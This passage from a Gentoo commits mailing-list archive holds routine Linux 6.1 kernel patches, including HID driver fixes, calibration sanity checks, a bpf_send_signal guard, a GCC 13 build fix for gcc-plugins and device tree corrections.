++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xRU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index c3735848ed5db..0f8c11842a3a5 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -1294,6 +1294,7 @@
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_G540	0x0075
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_G640	0x0094
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01	0x0042
++#define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2	0x0905
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L	0x0935
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S	0x0909
+ #define USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06	0x0078
+diff --git a/drivers/hid/hid-playstation.c b/drivers/hid/hid-playstation.c
+index 0b58763bfd301..2228f6e4ba23f 100644
+--- a/drivers/hid/hid-playstation.c
++++ b/drivers/hid/hid-playstation.c
+@@ -712,6 +712,7 @@ ATTRIBUTE_GROUPS(ps_device);
+ 
+ static int dualsense_get_calibration_data(struct dualsense *ds)
+ {
++	struct hid_device *hdev = ds->base.hdev;
+ 	short gyro_pitch_bias, gyro_pitch_plus, gyro_pitch_minus;
+ 	short gyro_yaw_bias, gyro_yaw_plus, gyro_yaw_minus;
+ 	short gyro_roll_bias, gyro_roll_plus, gyro_roll_minus;
+@@ -722,6 +723,7 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	int speed_2x;
+ 	int range_2g;
+ 	int ret = 0;
++	int i;
+ 	uint8_t *buf;
+ 
+ 	buf = kzalloc(DS_FEATURE_REPORT_CALIBRATION_SIZE, GFP_KERNEL);
+@@ -773,6 +775,21 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	ds->gyro_calib_data[2].sens_numer = speed_2x*DS_GYRO_RES_PER_DEG_S;
+ 	ds->gyro_calib_data[2].sens_denom = gyro_roll_plus - gyro_roll_minus;
+ 
++	/*
++	 * Sanity check gyro calibration data. This is needed to prevent crashes
++	 * during report handling of virtual, clone or broken devices not implementing
++	 * calibration data properly.
++	 */
++	for (i = 0; i < ARRAY_SIZE(ds->gyro_calib_data); i++) {
++		if (ds->gyro_calib_data[i].sens_denom == 0) {
++			hid_warn(hdev, "Invalid gyro calibration data for axis (%d), disabling calibration.",
++					ds->gyro_calib_data[i].abs_code);
++			ds->gyro_calib_data[i].bias = 0;
++			ds->gyro_calib_data[i].sens_numer = DS_GYRO_RANGE;
++			ds->gyro_calib_data[i].sens_denom = S16_MAX;
++		}
++	}
++
+ 	/*
+ 	 * Set accelerometer calibration and normalization parameters.
+ 	 * Data values will be normalized to 1/DS_ACC_RES_PER_G g.
+@@ -795,6 +812,21 @@ static int dualsense_get_calibration_data(struct dualsense *ds)
+ 	ds->accel_calib_data[2].sens_numer = 2*DS_ACC_RES_PER_G;
+ 	ds->accel_calib_data[2].sens_denom = range_2g;
+ 
++	/*
++	 * Sanity check accelerometer calibration data. This is needed to prevent crashes
++	 * during report handling of virtual, clone or broken devices not implementing calibration
++	 * data properly.
++	 */
++	for (i = 0; i < ARRAY_SIZE(ds->accel_calib_data); i++) {
++		if (ds->accel_calib_data[i].sens_denom == 0) {
++			hid_warn(hdev, "Invalid accelerometer calibration data for axis (%d), disabling calibration.",
++					ds->accel_calib_data[i].abs_code);
++			ds->accel_calib_data[i].bias = 0;
++			ds->accel_calib_data[i].sens_numer = DS_ACC_RANGE;
++			ds->accel_calib_data[i].sens_denom = S16_MAX;
++		}
++	}
++
+ err_free:
+ 	kfree(buf);
+ 	return ret;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index 7fa6fe04f1b26..cfbbc39807a69 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -525,6 +525,8 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_G640) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index cd1233d7e2535..3c5eea3df3288 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1655,6 +1655,8 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		break;
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_PARBLO_A610_PRO):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+diff --git a/drivers/nvme/host/apple.c b/drivers/nvme/host/apple.c
+index ff8b083dc5c6d..262d2b60ac6dd 100644
+--- a/drivers/nvme/host/apple.c
++++ b/drivers/nvme/host/apple.c
+@@ -987,11 +987,11 @@ static void apple_nvme_reset_work(struct work_struct *work)
+ 		goto out;
+ 	}
+ 
+-	if (anv->ctrl.ctrl_config & NVME_CC_ENABLE)
+-		apple_nvme_disable(anv, false);
+-
+ 	/* RTKit must be shut down cleanly for the (soft)-reset to work */
+ 	if (apple_rtkit_is_running(anv->rtk)) {
++		/* reset the controller if it is enabled */
++		if (anv->ctrl.ctrl_config & NVME_CC_ENABLE)
++			apple_nvme_disable(anv, false);
+ 		dev_dbg(anv->dev, "Trying to shut down RTKit before reset.");
+ 		ret = apple_rtkit_shutdown(anv->rtk);
+ 		if (ret)
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index 4302dc75843cb..3bc1d3494be3a 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -1050,10 +1050,10 @@ int dfs_cache_update_tgthint(const unsigned int xid, struct cifs_ses *ses,
+ 			     const struct nls_table *cp, int remap, const char *path,
+ 			     const struct dfs_cache_tgt_iterator *it)
+ {
+-	int rc;
+-	const char *npath;
+-	struct cache_entry *ce;
+ 	struct cache_dfs_tgt *t;
++	struct cache_entry *ce;
++	const char *npath;
++	int rc = 0;
+ 
+ 	npath = dfs_cache_canonical_path(path, cp, remap);
+ 	if (IS_ERR(npath))
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 481788c24a68b..626a615dafc2f 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -577,26 +577,25 @@ static int erofs_fc_parse_param(struct fs_context *fc,
+ 		}
+ 		++ctx->devs->extra_devices;
+ 		break;
+-	case Opt_fsid:
+ #ifdef CONFIG_EROFS_FS_ONDEMAND
++	case Opt_fsid:
+ 		kfree(ctx->fsid);
+ 		ctx->fsid = kstrdup(param->string, GFP_KERNEL);
+ 		if (!ctx->fsid)
+ 			return -ENOMEM;
+-#else
+-		errorfc(fc, "fsid option not supported");
+-#endif
+ 		break;
+ 	case Opt_domain_id:
+-#ifdef CONFIG_EROFS_FS_ONDEMAND
+ 		kfree(ctx->domain_id);
+ 		ctx->domain_id = kstrdup(param->string, GFP_KERNEL);
+ 		if (!ctx->domain_id)
+ 			return -ENOMEM;
++		break;
+ #else
+-		errorfc(fc, "domain_id option not supported");
+-#endif
++	case Opt_fsid:
++	case Opt_domain_id:
++		errorfc(fc, "%s option not supported", erofs_fs_parameters[opt].name);
+ 		break;
++#endif
+ 	default:
+ 		return -ENOPARAM;
+ 	}
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index e6d5d7a18fb06..39cc014dba40c 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -793,12 +793,16 @@ static int z_erofs_iomap_begin_report(struct inode *inode, loff_t offset,
+ 		iomap->type = IOMAP_HOLE;
+ 		iomap->addr = IOMAP_NULL_ADDR;
+ 		/*
+-		 * No strict rule how to describe extents for post EOF, yet
+-		 * we need do like below. Otherwise, iomap itself will get
++		 * No strict rule on how to describe extents for post EOF, yet
++		 * we need to do like below. Otherwise, iomap itself will get
+ 		 * into an endless loop on post EOF.
++		 *
++		 * Calculate the effective offset by subtracting extent start
++		 * (map.m_la) from the requested offset, and add it to length.
++		 * (NB: offset >= map.m_la always)
+ 		 */
+ 		if (iomap->offset >= inode->i_size)
+-			iomap->length = length + map.m_la - offset;
++			iomap->length = length + offset - map.m_la;
+ 	}
+ 	iomap->flags = 0;
+ 	return 0;
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 1ed08967fb979..eb8c117cc8b6c 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -847,6 +847,9 @@ static int bpf_send_signal_common(u32 sig, enum pid_type type)
+ 		return -EPERM;
+ 	if (unlikely(!nmi_uaccess_okay()))
+ 		return -EPERM;
++	/* Task should not be pid=1 to avoid kernel panic. */
++	if (unlikely(is_global_init(current)))
++		return -EPERM;
+ 
+ 	if (irqs_disabled()) {
+ 		/* Do an early check on signal validity. Otherwise,
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 759bede0b3dd6..51db260f471f4 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4034,7 +4034,7 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 
+ 	skb_shinfo(skb)->frag_list = NULL;
+ 
+-	do {
++	while (list_skb) {
+ 		nskb = list_skb;
+ 		list_skb = list_skb->next;
+ 
+@@ -4080,8 +4080,7 @@ struct sk_buff *skb_segment_list(struct sk_buff *skb,
+ 		if (skb_needs_linearize(nskb, features) &&
+ 		    __skb_linearize(nskb))
+ 			goto err_linearize;
+-
+-	} while (list_skb);
++	}
+ 
+ 	skb->truesize = skb->truesize - delta_truesize;
+ 	skb->data_len = skb->data_len - delta_len;
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index 3262ebb240926..8f0d7c666df7e 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4859,6 +4859,9 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		 */
+ 		shwt = skb_hwtstamps(rx->skb);
+ 		shwt->hwtstamp = skb_hwtstamps(skb)->hwtstamp;
++
++		/* Update the hdr pointer to the new skb for translation below */
++		hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	}
+ 
+ 	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
+diff --git a/net/mctp/af_mctp.c b/net/mctp/af_mctp.c
+index 45bbe3e54cc28..3150f3f0c8725 100644
+--- a/net/mctp/af_mctp.c
++++ b/net/mctp/af_mctp.c
+@@ -587,6 +587,11 @@ static void mctp_sk_unhash(struct sock *sk)
+ 	del_timer_sync(&msk->key_expiry);
+ }
+ 
++static void mctp_sk_destruct(struct sock *sk)
++{
++	skb_queue_purge(&sk->sk_receive_queue);
++}
++
+ static struct proto mctp_proto = {
+ 	.name		= "MCTP",
+ 	.owner		= THIS_MODULE,
+@@ -623,6 +628,7 @@ static int mctp_pf_create(struct net *net, struct socket *sock,
+ 		return -ENOMEM;
+ 
+ 	sock_init_data(sock, sk);
++	sk->sk_destruct = mctp_sk_destruct;
+ 
+ 	rc = 0;
+ 	if (sk->sk_prot->init)
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 55db5a1ba7521..97ff086ba22e9 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -115,17 +115,24 @@ pub unsafe fn call_printk(
+ macro_rules! print_macro (
+     // The non-continuation cases (most of them, e.g. `INFO`).
+     ($format_string:path, $($arg:tt)+) => (
+-        // SAFETY: This hidden macro should only be called by the documented
+-        // printing macros which ensure the format string is one of the fixed
+-        // ones. All `__LOG_PREFIX`s are null-terminated as they are generated
+-        // by the `module!` proc macro or fixed values defined in a kernel
+-        // crate.
+-        unsafe {
+-            $crate::print::call_printk(
+-                &$format_string,
+-                crate::__LOG_PREFIX,
+-                format_args!($($arg)+),
+-            );
++        // To remain sound, `arg`s must be expanded outside the `unsafe` block.
++        // Typically one would use a `let` binding for that; however, `format_args!`
++        // takes borrows on the arguments, but does not extend the scope of temporaries.
++        // Therefore, a `match` expression is used to keep them around, since
++        // the scrutinee is kept until the end of the `match`.
++        match format_args!($($arg)+) {
++            // SAFETY: This hidden macro should only be called by the documented
++            // printing macros which ensure the format string is one of the fixed
++            // ones. All `__LOG_PREFIX`s are null-terminated as they are generated
++            // by the `module!` proc macro or fixed values defined in a kernel
++            // crate.
++            args => unsafe {
++                $crate::print::call_printk(
++                    &$format_string,
++                    crate::__LOG_PREFIX,
++                    args,
++                );
++            }
+         }
+     );
+ );
+diff --git a/tools/testing/selftests/lib.mk b/tools/testing/selftests/lib.mk
+index 291144c284fbc..f7900e75d2306 100644
+--- a/tools/testing/selftests/lib.mk
++++ b/tools/testing/selftests/lib.mk
+@@ -20,7 +20,7 @@ CLANG_TARGET_FLAGS              := $(CLANG_TARGET_FLAGS_$(ARCH))
+ 
+ ifeq ($(CROSS_COMPILE),)
+ ifeq ($(CLANG_TARGET_FLAGS),)
+-$(error Specify CROSS_COMPILE or add '--target=' option to lib.mk
++$(error Specify CROSS_COMPILE or add '--target=' option to lib.mk)
+ else
+ CLANG_FLAGS     += --target=$(CLANG_TARGET_FLAGS)
+ endif # CLANG_TARGET_FLAGS


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-02 19:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-02-02 19:02 UTC (permalink / raw
  To: gentoo-commits

commit:     e34c0cb7d58c06e7245d9f5347d5da8e817b95ce
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Feb  2 19:01:33 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Feb  2 19:01:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e34c0cb7

gcc-plugins: drop -std=gnu++11 to fix GCC 13 build

See: https://lore.kernel.org/all/20230201230009.2252783-1-sam <AT> gentoo.org/

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ++
 ...rop-std-gnu-plus-plus-to-fix-GCC-13-build.patch | 46 ++++++++++++++++++++++
 2 files changed, 50 insertions(+)

diff --git a/0000_README b/0000_README
index 0965d9a9..1f899f11 100644
--- a/0000_README
+++ b/0000_README
@@ -115,6 +115,10 @@ Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
 From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
 Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
 
+Patch:  2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
+From:   https://lore.kernel.org/all/20230201230009.2252783-1-sam@gentoo.org/
+Desc:   gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
new file mode 100644
index 00000000..55797805
--- /dev/null
+++ b/2940_gcc-plugins-drop-std-gnu-plus-plus-to-fix-GCC-13-build.patch
@@ -0,0 +1,46 @@
+From 5a6b64adc18d9adfb497a529ff004d59b6df151f Mon Sep 17 00:00:00 2001
+From: Sam James <sam@gentoo.org>
+Date: Wed, 1 Feb 2023 23:00:09 +0000
+Subject: gcc-plugins: drop -std=gnu++11 to fix GCC 13 build
+
+The latest GCC 13 snapshot (13.0.1 20230129) gives the following:
+```
+cc1: error: cannot load plugin ./scripts/gcc-plugins/randomize_layout_plugin.so
+ :./scripts/gcc-plugins/randomize_layout_plugin.so: undefined symbol: tree_code_type
+```
+
+This ends up being because of https://gcc.gnu.org/git/gitweb.cgi?p=gcc.git;h=b0241ce6e37031
+upstream in GCC which changes the visibility of some types used by the kernel's
+plugin infrastructure like tree_code_type.
+
+After discussion with the GCC folks, we found that the kernel needs to be building
+plugins with the same flags used to build GCC - and GCC defaults to gnu++17
+right now. The minimum GCC version needed to build the kernel is GCC 5.1
+and GCC 5.1 already defaults to gnu++14 anyway, so just drop the flag, as
+all GCCs that could be used to build GCC already default to an acceptable
+version which was >= the version we forced via flags until now.
+
+Bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=108634
+Signed-off-by: Sam James <sam@gentoo.org>
+Signed-off-by: Kees Cook <keescook@chromium.org>
+Link: https://lore.kernel.org/r/20230201230009.2252783-1-sam@gentoo.org
+---
+ scripts/gcc-plugins/Makefile | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/scripts/gcc-plugins/Makefile b/scripts/gcc-plugins/Makefile
+index b34d11e226366..320afd3cf8e82 100644
+--- a/scripts/gcc-plugins/Makefile
++++ b/scripts/gcc-plugins/Makefile
+@@ -29,7 +29,7 @@ GCC_PLUGINS_DIR = $(shell $(CC) -print-file-name=plugin)
+ plugin_cxxflags	= -Wp,-MMD,$(depfile) $(KBUILD_HOSTCXXFLAGS) -fPIC \
+ 		  -include $(srctree)/include/linux/compiler-version.h \
+ 		  -DPLUGIN_VERSION=$(call stringify,$(KERNELVERSION)) \
+-		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) -std=gnu++11 \
++		  -I $(GCC_PLUGINS_DIR)/include -I $(obj) \
+ 		  -fno-rtti -fno-exceptions -fasynchronous-unwind-tables \
+ 		  -ggdb -Wno-narrowing -Wno-unused-variable \
+ 		  -Wno-format-diag
+-- 
+cgit 
+


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-02-01  8:05 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-02-01  8:05 UTC (permalink / raw
  To: gentoo-commits

commit:     cabf8a4c1fb2af4bb6390d026ade7dc8133df2d5
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Feb  1 08:03:33 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Feb  1 08:03:33 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cabf8a4c

Linux patch 6.1.9

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |     4 +
 1008_linux-6.1.9.patch | 11622 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11626 insertions(+)

diff --git a/0000_README b/0000_README
index 396dd2ee..0965d9a9 100644
--- a/0000_README
+++ b/0000_README
@@ -75,6 +75,10 @@ Patch:  1007_linux-6.1.8.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.8
 
+Patch:  1008_linux-6.1.9.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.9
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1008_linux-6.1.9.patch b/1008_linux-6.1.9.patch
new file mode 100644
index 00000000..f4ffc2a3
--- /dev/null
+++ b/1008_linux-6.1.9.patch
@@ -0,0 +1,11622 @@
+diff --git a/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml b/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
+index c46378efc1239..92e899905ef88 100644
+--- a/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
++++ b/Documentation/devicetree/bindings/i2c/renesas,rzv2m.yaml
+@@ -16,7 +16,7 @@ properties:
+   compatible:
+     items:
+       - enum:
+-          - renesas,i2c-r9a09g011  # RZ/V2M
++          - renesas,r9a09g011-i2c  # RZ/V2M
+       - const: renesas,rzv2m-i2c
+ 
+   reg:
+@@ -66,7 +66,7 @@ examples:
+     #include <dt-bindings/interrupt-controller/arm-gic.h>
+ 
+     i2c0: i2c@a4030000 {
+-        compatible = "renesas,i2c-r9a09g011", "renesas,rzv2m-i2c";
++        compatible = "renesas,r9a09g011-i2c", "renesas,rzv2m-i2c";
+         reg = <0xa4030000 0x80>;
+         interrupts = <GIC_SPI 232 IRQ_TYPE_EDGE_RISING>,
+                      <GIC_SPI 236 IRQ_TYPE_EDGE_RISING>;
+diff --git a/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml b/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
+index 01f9d4e236e94..a7feb497eb89b 100644
+--- a/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
++++ b/Documentation/devicetree/bindings/regulator/samsung,s2mps14.yaml
+@@ -19,8 +19,8 @@ description: |
+   additional information and example.
+ 
+ patternProperties:
+-  # 25 LDOs
+-  "^LDO([1-9]|[1][0-9]|2[0-5])$":
++  # 25 LDOs, without LDO10-12
++  "^LDO([1-9]|1[3-9]|2[0-5])$":
+     type: object
+     $ref: regulator.yaml#
+     unevaluatedProperties: false
+@@ -30,6 +30,23 @@ patternProperties:
+     required:
+       - regulator-name
+ 
++  "^LDO(1[0-2])$":
++    type: object
++    $ref: regulator.yaml#
++    unevaluatedProperties: false
++    description:
++      Properties for single LDO regulator.
++
++    properties:
++      samsung,ext-control-gpios:
++        maxItems: 1
++        description:
++          LDO10, LDO11 and LDO12 can be configured to external control over
++          GPIO.
++
++    required:
++      - regulator-name
++
+   # 5 bucks
+   "^BUCK[1-5]$":
+     type: object
+diff --git a/Documentation/devicetree/bindings/riscv/cpus.yaml b/Documentation/devicetree/bindings/riscv/cpus.yaml
+index 90a7cabf58feb..d4148418350c6 100644
+--- a/Documentation/devicetree/bindings/riscv/cpus.yaml
++++ b/Documentation/devicetree/bindings/riscv/cpus.yaml
+@@ -80,7 +80,7 @@ properties:
+       insensitive, letters in the riscv,isa string must be all
+       lowercase to simplify parsing.
+     $ref: "/schemas/types.yaml#/definitions/string"
+-    pattern: ^rv(?:64|32)imaf?d?q?c?b?v?k?h?(?:_[hsxz](?:[a-z])+)*$
++    pattern: ^rv(?:64|32)imaf?d?q?c?b?k?j?p?v?h?(?:[hsxz](?:[a-z])+)?(?:_[hsxz](?:[a-z])+)*$
+ 
+   # RISC-V requires 'timebase-frequency' in /cpus, so disallow it here
+   timebase-frequency: false
+diff --git a/Documentation/devicetree/bindings/sound/everest,es8326.yaml b/Documentation/devicetree/bindings/sound/everest,es8326.yaml
+old mode 100755
+new mode 100644
+diff --git a/Documentation/x86/amd-memory-encryption.rst b/Documentation/x86/amd-memory-encryption.rst
+index a1940ebe7be50..934310ce72582 100644
+--- a/Documentation/x86/amd-memory-encryption.rst
++++ b/Documentation/x86/amd-memory-encryption.rst
+@@ -95,3 +95,39 @@ by supplying mem_encrypt=on on the kernel command line.  However, if BIOS does
+ not enable SME, then Linux will not be able to activate memory encryption, even
+ if configured to do so by default or the mem_encrypt=on command line parameter
+ is specified.
++
++Secure Nested Paging (SNP)
++==========================
++
++SEV-SNP introduces new features (SEV_FEATURES[1:63]) which can be enabled
++by the hypervisor for security enhancements. Some of these features need
++guest side implementation to function correctly. The below table lists the
++expected guest behavior with various possible scenarios of guest/hypervisor
++SNP feature support.
++
+++-----------------+---------------+---------------+------------------+
++| Feature Enabled | Guest needs   | Guest has     | Guest boot       |
++| by the HV       | implementation| implementation| behaviour        |
+++=================+===============+===============+==================+
++|      No         |      No       |      No       |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      No         |      Yes      |      No       |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      No         |      Yes      |      Yes      |     Boot         |
++|                 |               |               |                  |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      No       |      No       | Boot with        |
++|                 |               |               | feature enabled  |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      Yes      |      No       | Graceful boot    |
++|                 |               |               | failure          |
+++-----------------+---------------+---------------+------------------+
++|      Yes        |      Yes      |      Yes      | Boot with        |
++|                 |               |               | feature enabled  |
+++-----------------+---------------+---------------+------------------+
++
++More details in AMD64 APM[1] Vol 2: 15.34.10 SEV_STATUS MSR
++
++[1] https://www.amd.com/system/files/TechDocs/40332.pdf
+diff --git a/Makefile b/Makefile
+index 49261450039a1..3778b422fa113 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 8
++SUBLEVEL = 9
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+@@ -538,7 +538,7 @@ LDFLAGS_MODULE  =
+ CFLAGS_KERNEL	=
+ RUSTFLAGS_KERNEL =
+ AFLAGS_KERNEL	=
+-export LDFLAGS_vmlinux =
++LDFLAGS_vmlinux =
+ 
+ # Use USERINCLUDE when you must reference the UAPI directories only.
+ USERINCLUDE    := \
+@@ -1232,6 +1232,18 @@ vmlinux.o modules.builtin.modinfo modules.builtin: vmlinux_o
+ 	@:
+ 
+ PHONY += vmlinux
++# LDFLAGS_vmlinux in the top Makefile defines linker flags for the top vmlinux,
++# not for decompressors. LDFLAGS_vmlinux in arch/*/boot/compressed/Makefile is
++# unrelated; the decompressors just happen to have the same base name,
++# arch/*/boot/compressed/vmlinux.
++# Export LDFLAGS_vmlinux only to scripts/Makefile.vmlinux.
++#
++# _LDFLAGS_vmlinux is a workaround for the 'private export' bug:
++#   https://savannah.gnu.org/bugs/?61463
++# For Make > 4.4, the following simple code will work:
++#  vmlinux: private export LDFLAGS_vmlinux := $(LDFLAGS_vmlinux)
++vmlinux: private _LDFLAGS_vmlinux := $(LDFLAGS_vmlinux)
++vmlinux: export LDFLAGS_vmlinux = $(_LDFLAGS_vmlinux)
+ vmlinux: vmlinux.o $(KBUILD_LDS) modpost
+ 	$(Q)$(MAKE) -f $(srctree)/scripts/Makefile.vmlinux
+ 
+@@ -1517,6 +1529,7 @@ endif
+ # *.ko are usually independent of vmlinux, but CONFIG_DEBUG_INFOBTF_MODULES
+ # is an exception.
+ ifdef CONFIG_DEBUG_INFO_BTF_MODULES
++KBUILD_BUILTIN := 1
+ modules: vmlinux
+ endif
+ 
+diff --git a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+index 4bc4371e6bae5..4b81a975c979d 100644
+--- a/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
++++ b/arch/arm/boot/dts/imx6qdl-gw560x.dtsi
+@@ -632,7 +632,6 @@
+ &uart1 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_uart1>;
+-	uart-has-rtscts;
+ 	rts-gpios = <&gpio7 1 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ };
+diff --git a/arch/arm/boot/dts/imx6ul-pico-dwarf.dts b/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
+index 162dc259edc8c..5a74c7f68eb62 100644
+--- a/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
++++ b/arch/arm/boot/dts/imx6ul-pico-dwarf.dts
+@@ -32,7 +32,7 @@
+ };
+ 
+ &i2c2 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c2>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/imx7d-pico-dwarf.dts b/arch/arm/boot/dts/imx7d-pico-dwarf.dts
+index 5162fe227d1ea..fdc10563f1473 100644
+--- a/arch/arm/boot/dts/imx7d-pico-dwarf.dts
++++ b/arch/arm/boot/dts/imx7d-pico-dwarf.dts
+@@ -32,7 +32,7 @@
+ };
+ 
+ &i2c1 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+@@ -52,7 +52,7 @@
+ };
+ 
+ &i2c4 {
+-	clock_frequency = <100000>;
++	clock-frequency = <100000>;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/imx7d-pico-nymph.dts b/arch/arm/boot/dts/imx7d-pico-nymph.dts
+index 104a85254adbb..5afb1674e0125 100644
+--- a/arch/arm/boot/dts/imx7d-pico-nymph.dts
